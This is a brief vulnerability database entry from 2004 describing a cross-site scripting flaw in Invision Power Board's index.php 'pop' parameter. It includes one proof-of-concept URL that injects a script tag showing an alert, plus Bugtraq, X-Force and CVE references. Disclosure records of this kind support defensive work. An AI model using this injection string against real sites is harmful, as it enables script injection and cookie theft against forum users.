Invision Power Board index.php pop Variable XSS

2004-03-08T17:44:13
ID OSVDB:18505
Type osvdb
Reporter OSVDB
Modified 2004-03-08T17:44:13

Description

Manual Testing Notes

http://[target]/forum//index.php?s=&act=chat&pop=1;'><script>alert('cookie')</script><plaintext>

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0082.html ISS X-Force ID: 15448 CVE-2004-2279